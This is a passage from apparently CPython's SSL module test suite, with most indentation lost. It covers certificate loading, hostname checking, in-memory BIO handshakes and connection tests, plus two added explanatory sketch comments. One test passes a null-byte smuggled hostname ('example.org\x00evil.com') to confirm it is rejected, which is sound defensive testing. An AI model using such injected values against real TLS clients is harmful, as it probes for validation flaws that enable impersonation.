self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        # Auto set CERT_REQUIRED again
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
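# --- Illustrative sketch, not part of the original test suite ----------------
# test_context_custom_class above exercises the sslsocket_class /
# sslobject_class hooks on SSLContext.  In application code the same hooks let
# you attach behaviour to every connection a context creates; a hypothetical
# example (the class name and print call are illustrative only):
#
#   class LoggingSSLSocket(ssl.SSLSocket):
#       def do_handshake(self, *args, **kwargs):
#           print("handshake with", self.server_hostname)
#           return super().do_handshake(*args, **kwargs)
#
#   ctx = ssl.create_default_context()
#   ctx.sslsocket_class = LoggingSSLSocket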
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
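# --- Illustrative sketch, not part of the original test suite ----------------
# SSLObjectTests.test_unwrap above spells out the in-memory handshake pattern:
# call do_handshake() on each SSLObject and shuttle whatever lands in one
# side's outgoing BIO into the other side's incoming BIO until neither side
# raises SSLWantReadError any more.  The helper below is a minimal sketch of
# that pump; it assumes the two contexts are already configured, e.g. as
# returned by testing_context() earlier in this file.
def _pump_in_memory_handshake(client_ctx, server_ctx, hostname, rounds=10):
    c_in, c_out = ssl.MemoryBIO(), ssl.MemoryBIO()
    s_in, s_out = ssl.MemoryBIO(), ssl.MemoryBIO()
    client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
    server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
    for _ in range(rounds):
        done = 0
        for sslobj, peer_in, own_out in ((client, s_in, c_out),
                                         (server, c_in, s_out)):
            try:
                # do_handshake() is a no-op once the handshake is complete,
                # so counting the sides that do not raise tells us when both
                # endpoints are done.
                sslobj.do_handshake()
                done += 1
            except ssl.SSLWantReadError:
                pass
            # Always flush this side's output into the peer's input.
            if own_out.pending:
                peer_in.write(own_out.read())
        if done == 2:
            return client, server
    raise RuntimeError("handshake did not settle in %d rounds" % rounds)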
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop: call func(*args) and, depending on the error we
        # get (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
